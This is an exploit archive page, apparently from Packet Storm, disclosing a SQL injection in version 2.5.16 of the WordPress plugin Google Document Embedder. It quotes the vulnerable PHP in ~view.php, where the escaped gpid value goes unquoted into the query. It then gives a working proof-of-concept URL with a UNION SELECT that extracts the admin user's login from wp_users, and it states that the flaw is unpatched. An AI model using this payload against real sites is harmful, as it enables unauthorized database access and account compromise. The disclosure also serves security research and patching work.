exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Document Embedder 2.5.16 SQL Injection

Google Document Embedder 2.5.16 SQL Injection
Posted Dec 4, 2014
Authored by Securely

Google Document Embedder version 2.5.16 suffers from a mysql_real_escape_string bypass SQL injection vulnerability.

tags | exploit, sql injection
SHA-256 | 087cee08975e4af001863f3fcbd05f44b7c3a9b20100ba060bae9baa8d04ac88
Download | Favorite | View

Google Document Embedder 2.5.16 SQL Injection

Change Mirror Download
Exploit Title : Google Document Embedder 2.5.16 mysql_real_escpae_string bypass SQL Injection
Data : 2014 – 12 -03
Exploit Author : Securely (Yoo Hee man)
Plugin : google-document-embedder
Fixed version : N/A
Software Link : https://downloads.wordpress.org/plugin/google-document-embedder.2.5.16.zip
 
1. Detail
- Google Document Embedder v2.5.14 have SQL Injection
- This Plugin v2.5.16 uses mysql_real_escape_string function has been patched to SQL Injection.
- but mysql_real_escape_string() function is bypass possible
- vulnerability file : /google-document-embedder/~view.php
 
================================================================
50  // get profile
51  if ( isset( $_GET['gpid'] ) ) {
52      $gpid = mysql_real_escape_string( $_GET['gpid'] );
        //mysql_real_escape_string() is bypass
53      if ( $profile = gde_get_profile( $gpid ) ) {
54          $tb = $profile['tb_flags'];
55          $vw = $profile['vw_flags'];
56          $bg = $profile['vw_bgcolor'];
57          $css = $profile['vw_css'];
58      }
59  }
================================================================
 
===============================================================
373 function gde_get_profile( $id ) {
374 global $wpdb;
375 $table = $wpdb->prefix . 'gde_profiles';
376
377 $profile = $wpdb->get_results( "SELECT * FROM $table WHERE
 
profile_id = $id", ARRAY_A );
378 $profile = unserialize($profile[0]['profile_data']);
379
380 if ( is_array($profile) ) {
381     return $profile;
382 } else {
383     return false;
384 }
385 }
================================================================
 
2. POC
http://target/wp-content/plugins/google-document-embedder/~view.php?embedded=1&gpid=0%20UNION%20SELECT%201,%202,%203,%20CONCAT(CAST(CHAR(97,%2058,%2049,%2058,%20123,%20115,%2058,%2054,%2058,%2034,%20118,%20119,%2095,%2099,%20115,%20115,%2034,%2059,%20115,%2058)%20as%20CHAR),%20LENGTH(user_login),%20CAST(CHAR(58,%2034)%20as%20CHAR),%20user_login,%20CAST(CHAR(34,%2059,%20125)%20as%20CHAR))%20FROM%20wp_users%20WHERE%20ID=1
 
3. Solution:
Not patched
 
4. Discovered By : Securely(Yoo Hee man)
                 God2zuzu@naver.com

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close